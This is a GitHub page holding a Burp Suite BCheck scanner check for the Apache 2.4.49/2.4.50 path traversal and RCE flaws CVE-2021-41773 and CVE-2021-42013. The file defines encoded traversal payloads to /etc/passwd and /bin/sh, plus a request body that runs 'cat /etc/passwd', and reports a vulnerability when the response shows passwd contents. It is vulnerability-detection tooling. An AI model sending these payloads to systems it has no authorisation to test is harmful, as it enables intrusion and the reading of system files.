-
Notifications
You must be signed in to change notification settings - Fork 117
/
Copy pathCVE-2021-41773_CVE-2021-42013 Apache-2.4.49-50.bcheck
62 lines (52 loc) · 2.8 KB
/
CVE-2021-41773_CVE-2021-42013 Apache-2.4.49-50.bcheck
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
metadata:
language: v2-beta
name: "CVE-2021-41773 & CVE-2021-42013 (Apache 2.4.49 and 2.4.50)"
description: "Path traversal and RCE tests for CVE-2021-41773 and CVE-2021-42013"
author: "r3nt0n"
tags: "active", "apache", "cve", "path traversal", "rce"
define:
payload_path_trav_49 = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd"
payload_rce_49 = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
payload_path_trav_50 = "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
payload_rce_50 = "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
given host then
# Apache 2.4.49 (CVE-2021-41773)
send request called path_trav_49:
replacing path: `{payload_path_trav_49}`
if "root:x:0" in {path_trav_49.response} then
report issue and continue:
name: `Path Traversal (CVE-2021-41773)`
severity: high
confidence: firm
detail: `Path traversal via Apache 2.4.49 (CVE-2021-41773)`
end if
send request called rce_49:
replacing path: `{payload_rce_49}`
replacing body: `echo Content-Type: text/plain; echo; cat /etc/passwd`
if "root:x:0" in {rce_49.response} then
report issue: # stop here if find issue, continue if not
name: `Remote Code Execution (CVE-2021-41773)`
severity: high
confidence: firm
detail: `Remote code execution via Apache 2.4.49 (CVE-2021-41773)`
end if
# Apache 2.4.50 (CVE-2021-42013)
send request called path_trav_50:
replacing path: `{payload_path_trav_50}`
if "root:x:0" in {path_trav_50.response} then
report issue and continue:
name: `Path Traversal (CVE-2021-42013)`
severity: high
confidence: firm
detail: `Path traversal via Apache 2.4.50 (CVE-2021-42013)`
end if
send request called rce_50:
replacing path: `{payload_rce_50}`
replacing body: `echo Content-Type: text/plain; echo; cat /etc/passwd`
if "root:x:0" in {rce_50.response} then
report issue:
name: `Remote Code Execution (CVE-2021-42013)`
severity: high
confidence: firm
detail: `Remote code execution via Apache 2.4.50 (CVE-2021-42013)`
end if